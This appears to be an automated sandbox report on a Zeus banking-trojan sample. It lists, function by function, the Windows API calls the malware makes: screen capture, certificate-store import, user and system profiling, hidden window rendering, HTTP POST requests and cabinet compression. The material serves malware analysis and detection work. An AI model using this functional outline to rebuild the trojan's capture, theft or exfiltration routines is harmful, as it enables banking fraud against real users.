Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C64FD, Relevance: 6.0, APIs: 4, Instructions: 32

APIs

socket.WS2_32(00000000,00000001,00000006), ref: 003C6506
bind.WS2_32(00000000,?,-0000001D), ref: 003C6526
listen.WS2_32(00000000,?), ref: 003C6535
#3.WS2_32(00000000,?,003B4C21,7FFFFFFF,?,00000000,00000080), ref: 003C6540

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003CD64B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101

APIs

PFXImportCertStore.CRYPT32(?,?,?), ref: 003CD664

Part of subcall function 003C262D: WaitForSingleObject.KERNEL32(00000000,003B776D), ref: 003C2635

GetSystemTime.KERNEL32(?), ref: 003CD6B0

Part of subcall function 003CD42A: GetUserNameExW.SECUR32(00000002,?,00000001,?,?,?,003CD581,?,?,00000000), ref: 003CD43F

Part of subcall function 003C40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 003C40CF

Strings

.txt, xrefs: 003CD746

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 004167DB, Relevance: 4.5, APIs: 3, Instructions: 27

APIs

socket.WS2_32(00000000,00000002,00000011), ref: 004167E4
bind.WS2_32(00000000,00000017,-0000001D), ref: 00416804
closesocket.WS2_32(00000000), ref: 0041680F

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C67DB, Relevance: 4.5, APIs: 3, Instructions: 27

APIs

socket.WS2_32(00000000,00000002,00000011), ref: 003C67E4
bind.WS2_32(00000000,00000017,-0000001D), ref: 003C6804
#3.WS2_32(00000000), ref: 003C680F

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003B70A6, Relevance: 3.0, APIs: 2, Instructions: 37

APIs

GetVersionExW.KERNEL32(?,?,00000000,00000006), ref: 003B70CA
GetNativeSystemInfo.KERNEL32(?), ref: 003B70D8

Part of subcall function 003B6FD0: GetVersionExW.KERNEL32(?,76C61857), ref: 003B6FEF

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C34E5, Relevance: 1.5, APIs: 1, Instructions: 20

APIs

GetTimeZoneInformation.KERNEL32(?), ref: 003C34F4

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0040EA11, Relevance: 82.6, APIs: 27, Strings: 20, Instructions: 389

APIs

LoadLibraryA.KERNEL32(gdiplus.dll), ref: 0040EA43
GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 0040EA54
GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 0040EA61
GetProcAddress.KERNEL32(00000000,GdipCreateBitmapFromHBITMAP), ref: 0040EA6E
GetProcAddress.KERNEL32(00000000,GdipDisposeImage), ref: 0040EA7B
GetProcAddress.KERNEL32(00000000,GdipGetImageEncodersSize), ref: 0040EA88
GetProcAddress.KERNEL32(00000000,GdipGetImageEncoders), ref: 0040EA95
GetProcAddress.KERNEL32(00000000,GdipSaveImageToStream), ref: 0040EAA2
LoadLibraryA.KERNEL32(ole32.dll), ref: 0040EAEA
GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0040EAF5
LoadLibraryA.KERNEL32(gdi32.dll), ref: 0040EB07
GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 0040EB12
GetProcAddress.KERNEL32(00000000,CreateCompatibleDC), ref: 0040EB1E
GetProcAddress.KERNEL32(00000000,CreateCompatibleBitmap), ref: 0040EB2B
GetProcAddress.KERNEL32(00000000,GetDeviceCaps), ref: 0040EB38
GetProcAddress.KERNEL32(00000000,SelectObject), ref: 0040EB45
GetProcAddress.KERNEL32(00000000,BitBlt), ref: 0040EB52
GetProcAddress.KERNEL32(00000000,DeleteObject), ref: 0040EB5F
GetProcAddress.KERNEL32(00000000,DeleteDC), ref: 0040EB6C
LoadImageW.USER32(00000000,00007F00,00000002,00000000,00000000,00008040), ref: 0040EC10
GetIconInfo.USER32(00000000,?), ref: 0040EC25
GetCursorPos.USER32(?), ref: 0040EC33
DrawIcon.USER32(?,?,?,?), ref: 0040ED04

Part of subcall function 0041338B: HeapAlloc.KERNEL32(00000008,-00000004,00414B59,00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 0041339C

lstrcmpiW.KERNEL32(?,-00000030), ref: 0040ED85

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

FreeLibrary.KERNEL32(00000000), ref: 0040EE9C
FreeLibrary.KERNEL32(?), ref: 0040EEA6
FreeLibrary.KERNEL32(00000000), ref: 0040EEB0

Strings

BitBlt, xrefs: 0040EB47
gdi32.dll, xrefs: 0040EB02
DeleteObject, xrefs: 0040EB54
GdipDisposeImage, xrefs: 0040EA70
GetDeviceCaps, xrefs: 0040EB2D
ole32.dll, xrefs: 0040EAE5
GdiplusStartup, xrefs: 0040EA4B
SelectObject, xrefs: 0040EB3A
GdiplusShutdown, xrefs: 0040EA56
CreateCompatibleDC, xrefs: 0040EB14
gdiplus.dll, xrefs: 0040EA25
GdipGetImageEncodersSize, xrefs: 0040EA7D
DISPLAY, xrefs: 0040EBDE
DeleteDC, xrefs: 0040EB61
CreateDCW, xrefs: 0040EB09
GdipGetImageEncoders, xrefs: 0040EA8A
CreateCompatibleBitmap, xrefs: 0040EB20
GdipSaveImageToStream, xrefs: 0040EA97
GdipCreateBitmapFromHBITMAP, xrefs: 0040EA63
CreateStreamOnHGlobal, xrefs: 0040EAEC

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 004054A9, Relevance: 52.8, APIs: 29, Strings: 1, Instructions: 308

APIs

Part of subcall function 0040DCA2: GetClassNameW.USER32(76FC8F97,?,00000101), ref: 0040DCBD

GetWindowInfo.USER32(?,?), ref: 00405515
IntersectRect.USER32(?,?,-00000114), ref: 00405538
IntersectRect.USER32(?,?,-00000114), ref: 0040558E
GetDC.USER32(00000000), ref: 004055D2
CreateCompatibleDC.GDI32(00000000), ref: 004055E3
ReleaseDC.USER32(00000000,00000000), ref: 004055ED
SelectObject.GDI32(00000000,?), ref: 00405602
DeleteDC.GDI32(00000000), ref: 00405610
TlsSetValue.KERNEL32(?), ref: 0040565B
EqualRect.USER32(?,?), ref: 00405675
SaveDC.GDI32(00000000), ref: 00405680
SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 0040569B
SendMessageW.USER32(?,00000085,00000001,00000000), ref: 004056BB
DefWindowProcW.USER32(?,00000317,00000000,00000002), ref: 004056CD
RestoreDC.GDI32(00000000,?), ref: 004056E4
SaveDC.GDI32(00000000), ref: 00405706
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0040571C
SendMessageW.USER32(?,00000014,00000000,00000000), ref: 00405735
RestoreDC.GDI32(00000000,?), ref: 00405743
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00405756
SendMessageW.USER32(?,0000000F,00000000,00000000), ref: 00405766
DefWindowProcW.USER32(?,00000317,00000000,00000004), ref: 00405778
TlsSetValue.KERNEL32(00000000), ref: 00405792
SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 004057B2
DefWindowProcW.USER32(00000004,00000317,00000000,0000000E), ref: 004057CE
SelectObject.GDI32(00000000,?), ref: 004057E4
DeleteDC.GDI32(00000000), ref: 004057EB
SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 00405813

Part of subcall function 004053C7: GdiFlush.GDI32 ref: 0040541E

PrintWindow.USER32(00000008,00000000,00000000), ref: 00405829

Strings

<, xrefs: 0040550B

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003B54A9, Relevance: 52.8, APIs: 29, Strings: 1, Instructions: 308

APIs

Part of subcall function 003BDCA2: GetClassNameW.USER32(003E01CA,?,00000101), ref: 003BDCBD

GetWindowInfo.USER32(?,?), ref: 003B5515
IntersectRect.USER32(?,?,-00000114), ref: 003B5538
IntersectRect.USER32(?,?,-00000114), ref: 003B558E
GetDC.USER32(00000000), ref: 003B55D2
CreateCompatibleDC.GDI32(00000000), ref: 003B55E3
ReleaseDC.USER32(00000000,00000000), ref: 003B55ED
SelectObject.GDI32(00000000,?), ref: 003B5602
DeleteDC.GDI32(00000000), ref: 003B5610
TlsSetValue.KERNEL32(?), ref: 003B565B
EqualRect.USER32(?,?), ref: 003B5675
SaveDC.GDI32(00000000), ref: 003B5680
SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 003B569B
SendMessageW.USER32(?,00000085,00000001,00000000), ref: 003B56BB
DefWindowProcW.USER32(?,00000317,00000000,00000002), ref: 003B56CD
RestoreDC.GDI32(00000000,?), ref: 003B56E4
SaveDC.GDI32(00000000), ref: 003B5706
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 003B571C
SendMessageW.USER32(?,00000014,00000000,00000000), ref: 003B5735
RestoreDC.GDI32(00000000,?), ref: 003B5743
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 003B5756
SendMessageW.USER32(?,0000000F,00000000,00000000), ref: 003B5766
DefWindowProcW.USER32(?,00000317,00000000,00000004), ref: 003B5778
TlsSetValue.KERNEL32(00000000), ref: 003B5792
SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 003B57B2
DefWindowProcW.USER32(00000004,00000317,00000000,0000000E), ref: 003B57CE
SelectObject.GDI32(00000000,?), ref: 003B57E4
DeleteDC.GDI32(00000000), ref: 003B57EB
SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 003B5813

Part of subcall function 003B53C7: GdiFlush.GDI32 ref: 003B541E

PrintWindow.USER32(00000008,00000000,00000000), ref: 003B5829

Strings

<, xrefs: 003B550B

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0040DD09, Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 205

APIs

TlsAlloc.KERNEL32(00422868,00000000,0000018C,00000000,00000000), ref: 0040DD22
RegisterWindowMessageW.USER32(?,84889911,?,00000000), ref: 0040DD4A
CreateEventW.KERNEL32(00422C30,00000001,00000000,?,84889912,?,00000001), ref: 0040DD74
CreateMutexW.KERNEL32(00422C30,00000000,?,18782822,?,00000001), ref: 0040DD97
CreateFileMappingW.KERNEL32(00000000,00422C30,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 0040DDC2
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 0040DDD8
GetDC.USER32(00000000), ref: 0040DDF5
GetDeviceCaps.GDI32(00000000,00000008), ref: 0040DE15
GetDeviceCaps.GDI32(?,0000000A), ref: 0040DE1F
CreateCompatibleBitmap.GDI32(?,00000000,00000000), ref: 0040DE32

Part of subcall function 00419959: GetDIBits.GDI32(00000000,0040DE4B,00000000,00000001,00000000,00000000,00000000), ref: 00419991
Part of subcall function 00419959: GetDIBits.GDI32(00000000,0040DE4B,00000000,00000001,00000000,00000000,00000000), ref: 004199A7
Part of subcall function 00419959: DeleteObject.GDI32(0040DE4B), ref: 004199B4
Part of subcall function 00419959: CreateDIBSection.GDI32(00000000,00000000,00000000,00422888,?,?), ref: 00419A24
Part of subcall function 00419959: DeleteObject.GDI32(0040DE4B), ref: 00419A43

ReleaseDC.USER32(00000000,?), ref: 0040DE56

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

CreateMutexW.KERNEL32(00422C30,00000000,?,1898B122,?,00000001,004228B8,?,00000102,004228A4,00422E70,00000010,?,?), ref: 0040DF00
GetDC.USER32(00000000), ref: 0040DF15
CreateCompatibleDC.GDI32(00000000), ref: 0040DF23
CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 0040DF3A
SelectObject.GDI32(00000000,00000000), ref: 0040DF4D
ReleaseDC.USER32(00000000,00000001), ref: 0040DF65

Strings

0,B, xrefs: 0040DD6E

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003BDD09, Relevance: 25.7, APIs: 17, Instructions: 205

APIs

TlsAlloc.KERNEL32(003D2868,00000000,0000018C,00000000,00000000), ref: 003BDD22
RegisterWindowMessageW.USER32(?,84889911,?,00000000), ref: 003BDD4A
CreateEventW.KERNEL32(003D2C30,00000001,00000000,?,84889912,?,00000001), ref: 003BDD74
CreateMutexW.KERNEL32(003D2C30,00000000,?,18782822,?,00000001), ref: 003BDD97
CreateFileMappingW.KERNEL32(00000000,003D2C30,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 003BDDC2
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 003BDDD8
GetDC.USER32(00000000), ref: 003BDDF5
GetDeviceCaps.GDI32(00000000,00000008), ref: 003BDE15
GetDeviceCaps.GDI32(?,0000000A), ref: 003BDE1F
CreateCompatibleBitmap.GDI32(?,00000000,00000000), ref: 003BDE32

Part of subcall function 003C9959: GetDIBits.GDI32(00000000,003BDE4B,00000000,00000001,00000000,00000000,00000000), ref: 003C9991
Part of subcall function 003C9959: GetDIBits.GDI32(00000000,003BDE4B,00000000,00000001,00000000,00000000,00000000), ref: 003C99A7
Part of subcall function 003C9959: DeleteObject.GDI32(003BDE4B), ref: 003C99B4
Part of subcall function 003C9959: CreateDIBSection.GDI32(00000000,00000000,00000000,003D2888,?,?), ref: 003C9A24
Part of subcall function 003C9959: DeleteObject.GDI32(003BDE4B), ref: 003C9A43

ReleaseDC.USER32(00000000,?), ref: 003BDE56

Part of subcall function 003C33BB: HeapFree.KERNEL32(00000000,00000000,003C4BB2), ref: 003C33CE

CreateMutexW.KERNEL32(003D2C30,00000000,?,1898B122,?,00000001,003D28B8,?,00000102,003D28A4,003D2E70,00000010,?,?), ref: 003BDF00
GetDC.USER32(00000000), ref: 003BDF15
CreateCompatibleDC.GDI32(00000000), ref: 003BDF23
CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 003BDF3A
SelectObject.GDI32(00000000,00000000), ref: 003BDF4D
ReleaseDC.USER32(00000000,00000001), ref: 003BDF65

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C1A04, Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 182

APIs

Part of subcall function 003C7E19: InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 003C7E48

InternetOpenA.WININET(00000000,00000000,00000000,00000000,?), ref: 003C1A36
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003C1A57
HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,?,00000000,-00000001,00000000), ref: 003C1AA6
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 003C1AFD

Part of subcall function 003C338B: HeapAlloc.KERNEL32(00000008,-00000004,003C4B59,00000000,?,?,?,003C1E08,00000000,003C22ED,?,?,00000000), ref: 003C339C

HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 003C1B75
HttpSendRequestA.WININET(00000000,00000000,00000000,?,?), ref: 003C1B98
HttpQueryInfoA.WININET(00000000,20000013,?,?,00000000), ref: 003C1BC0

Part of subcall function 003C54F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 003C5505
Part of subcall function 003C54F1: GetLastError.KERNEL32 ref: 003C550F
Part of subcall function 003C54F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 003C552F

InternetCloseHandle.WININET(00000000), ref: 003C1C05
InternetCloseHandle.WININET(?), ref: 003C1C0F
InternetCloseHandle.WININET(?), ref: 003C1C19

Part of subcall function 003C33BB: HeapFree.KERNEL32(00000000,00000000,003C4BB2), ref: 003C33CE

Strings

HTTP/1.1, xrefs: 003C1A98
POST, xrefs: 003C1A6F
GET, xrefs: 003C1A76, 003C1AA1
n><>F>, xrefs: 003C1BC0

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00411A04, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 182

APIs

Part of subcall function 00417E19: InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 00417E48

InternetOpenA.WININET(00000000,00000000,00000000,00000000,?), ref: 00411A36
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00411A57
HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,?,00000000,-00000001,00000000), ref: 00411AA6
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 00411AFD

Part of subcall function 0041338B: HeapAlloc.KERNEL32(00000008,-00000004,00414B59,00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 0041339C

HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 00411B75
HttpSendRequestA.WININET(00000000,00000000,00000000,?,?), ref: 00411B98
HttpQueryInfoA.WININET(00000000,20000013,?,?,00000000), ref: 00411BC0

Part of subcall function 004154F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 00415505
Part of subcall function 004154F1: GetLastError.KERNEL32 ref: 0041550F
Part of subcall function 004154F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 0041552F

InternetCloseHandle.WININET(00000000), ref: 00411C05
InternetCloseHandle.WININET(?), ref: 00411C0F
InternetCloseHandle.WININET(?), ref: 00411C19

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Strings

POST, xrefs: 00411A6F
GET, xrefs: 00411A76, 00411AA1
HTTP/1.1, xrefs: 00411A98

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0040E240, Relevance: 22.6, APIs: 15, Instructions: 132

APIs

GetMenu.USER32(?), ref: 0040E26A
GetMenuItemCount.USER32(00000000), ref: 0040E280
GetMenuState.USER32(00000000,00000000,00000400), ref: 0040E298
HiliteMenuItem.USER32(?,00000000,00000000,00000400), ref: 0040E2A8
MenuItemFromPoint.USER32(?,00000000,?,?), ref: 0040E2CE
GetMenuState.USER32(00000000,00000000,00000400), ref: 0040E2E2
EndMenu.USER32 ref: 0040E2F2
HiliteMenuItem.USER32(?,00000000,00000000,00000480), ref: 0040E302
GetSubMenu.USER32(00000000,00000000), ref: 0040E326
GetMenuItemRect.USER32(?,00000000,00000000,?), ref: 0040E340
TrackPopupMenuEx.USER32(00000000,00004000,?,?,?,00000000), ref: 0040E361
GetMenuItemID.USER32(00000000,00000000), ref: 0040E379
SendMessageW.USER32(?,00000111,?,00000000), ref: 0040E392

Part of subcall function 004054A9: GetWindowInfo.USER32(?,?), ref: 00405515
Part of subcall function 004054A9: IntersectRect.USER32(?,?,-00000114), ref: 00405538
Part of subcall function 004054A9: IntersectRect.USER32(?,?,-00000114), ref: 0040558E
Part of subcall function 004054A9: GetDC.USER32(00000000), ref: 004055D2
Part of subcall function 004054A9: CreateCompatibleDC.GDI32(00000000), ref: 004055E3
Part of subcall function 004054A9: ReleaseDC.USER32(00000000,00000000), ref: 004055ED
Part of subcall function 004054A9: SelectObject.GDI32(00000000,?), ref: 00405602
Part of subcall function 004054A9: DeleteDC.GDI32(00000000), ref: 00405610
Part of subcall function 004054A9: TlsSetValue.KERNEL32(?), ref: 0040565B
Part of subcall function 004054A9: EqualRect.USER32(?,?), ref: 00405675
Part of subcall function 004054A9: SaveDC.GDI32(00000000), ref: 00405680
Part of subcall function 004054A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 0040569B
Part of subcall function 004054A9: SendMessageW.USER32(?,00000085,00000001,00000000), ref: 004056BB
Part of subcall function 004054A9: DefWindowProcW.USER32(?,00000317,00000000,00000002), ref: 004056CD
Part of subcall function 004054A9: RestoreDC.GDI32(00000000,?), ref: 004056E4
Part of subcall function 004054A9: SaveDC.GDI32(00000000), ref: 00405706
Part of subcall function 004054A9: SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0040571C
Part of subcall function 004054A9: SendMessageW.USER32(?,00000014,00000000,00000000), ref: 00405735
Part of subcall function 004054A9: RestoreDC.GDI32(00000000,?), ref: 00405743
Part of subcall function 004054A9: SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00405756
Part of subcall function 004054A9: SendMessageW.USER32(?,0000000F,00000000,00000000), ref: 00405766
Part of subcall function 004054A9: DefWindowProcW.USER32(?,00000317,00000000,00000004), ref: 00405778
Part of subcall function 004054A9: TlsSetValue.KERNEL32(00000000), ref: 00405792
Part of subcall function 004054A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 004057B2
Part of subcall function 004054A9: DefWindowProcW.USER32(00000004,00000317,00000000,0000000E), ref: 004057CE
Part of subcall function 004054A9: SelectObject.GDI32(00000000,?), ref: 004057E4
Part of subcall function 004054A9: DeleteDC.GDI32(00000000), ref: 004057EB
Part of subcall function 004054A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 00405813
Part of subcall function 004054A9: PrintWindow.USER32(00000008,00000000,00000000), ref: 00405829

SetKeyboardState.USER32 ref: 0040E3D1
SetEvent.KERNEL32 ref: 0040E3DD

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003BE240, Relevance: 22.6, APIs: 15, Instructions: 132

APIs

GetMenu.USER32(?), ref: 003BE26A
GetMenuItemCount.USER32(00000000), ref: 003BE280
GetMenuState.USER32(00000000,00000000,00000400), ref: 003BE298
HiliteMenuItem.USER32(?,00000000,00000000,00000400), ref: 003BE2A8
MenuItemFromPoint.USER32(?,00000000,?,?), ref: 003BE2CE
GetMenuState.USER32(00000000,00000000,00000400), ref: 003BE2E2
EndMenu.USER32 ref: 003BE2F2
HiliteMenuItem.USER32(?,00000000,00000000,00000480), ref: 003BE302
GetSubMenu.USER32(00000000,00000000), ref: 003BE326
GetMenuItemRect.USER32(?,00000000,00000000,?), ref: 003BE340
TrackPopupMenuEx.USER32(00000000,00004000,?,?,?,00000000), ref: 003BE361
GetMenuItemID.USER32(00000000,00000000), ref: 003BE379
SendMessageW.USER32(?,00000111,?,00000000), ref: 003BE392

Part of subcall function 003B54A9: GetWindowInfo.USER32(?,?), ref: 003B5515
Part of subcall function 003B54A9: IntersectRect.USER32(?,?,-00000114), ref: 003B5538
Part of subcall function 003B54A9: IntersectRect.USER32(?,?,-00000114), ref: 003B558E
Part of subcall function 003B54A9: GetDC.USER32(00000000), ref: 003B55D2
Part of subcall function 003B54A9: CreateCompatibleDC.GDI32(00000000), ref: 003B55E3
Part of subcall function 003B54A9: ReleaseDC.USER32(00000000,00000000), ref: 003B55ED
Part of subcall function 003B54A9: SelectObject.GDI32(00000000,?), ref: 003B5602
Part of subcall function 003B54A9: DeleteDC.GDI32(00000000), ref: 003B5610
Part of subcall function 003B54A9: TlsSetValue.KERNEL32(?), ref: 003B565B
Part of subcall function 003B54A9: EqualRect.USER32(?,?), ref: 003B5675
Part of subcall function 003B54A9: SaveDC.GDI32(00000000), ref: 003B5680
Part of subcall function 003B54A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 003B569B
Part of subcall function 003B54A9: SendMessageW.USER32(?,00000085,00000001,00000000), ref: 003B56BB
Part of subcall function 003B54A9: DefWindowProcW.USER32(?,00000317,00000000,00000002), ref: 003B56CD
Part of subcall function 003B54A9: RestoreDC.GDI32(00000000,?), ref: 003B56E4
Part of subcall function 003B54A9: SaveDC.GDI32(00000000), ref: 003B5706
Part of subcall function 003B54A9: SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 003B571C
Part of subcall function 003B54A9: SendMessageW.USER32(?,00000014,00000000,00000000), ref: 003B5735
Part of subcall function 003B54A9: RestoreDC.GDI32(00000000,?), ref: 003B5743
Part of subcall function 003B54A9: SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 003B5756
Part of subcall function 003B54A9: SendMessageW.USER32(?,0000000F,00000000,00000000), ref: 003B5766
Part of subcall function 003B54A9: DefWindowProcW.USER32(?,00000317,00000000,00000004), ref: 003B5778
Part of subcall function 003B54A9: TlsSetValue.KERNEL32(00000000), ref: 003B5792
Part of subcall function 003B54A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 003B57B2
Part of subcall function 003B54A9: DefWindowProcW.USER32(00000004,00000317,00000000,0000000E), ref: 003B57CE
Part of subcall function 003B54A9: SelectObject.GDI32(00000000,?), ref: 003B57E4
Part of subcall function 003B54A9: DeleteDC.GDI32(00000000), ref: 003B57EB
Part of subcall function 003B54A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 003B5813
Part of subcall function 003B54A9: PrintWindow.USER32(00000008,00000000,00000000), ref: 003B5829

SetKeyboardState.USER32 ref: 003BE3D1
SetEvent.KERNEL32 ref: 003BE3DD

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 004170A1, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 52

APIs

LoadLibraryA.KERNEL32(cabinet.dll), ref: 004170B5
GetProcAddress.KERNEL32(00000000,FCICreate,?,?,004173A4,?,?,00000000,?), ref: 004170D5
GetProcAddress.KERNEL32(FCIAddFile,?,004173A4,?,?,00000000,?), ref: 004170E7
GetProcAddress.KERNEL32(FCIFlushCabinet,?,004173A4,?,?,00000000,?), ref: 004170F9
GetProcAddress.KERNEL32(FCIDestroy,?,004173A4,?,?,00000000,?), ref: 0041710B
HeapCreate.KERNEL32(00000000,00080000,00000000,004173A4,?,?,00000000,?), ref: 00417136
FreeLibrary.KERNEL32(004173A4,?,?,00000000,?), ref: 0041714B

Strings

FCIAddFile, xrefs: 004170D7
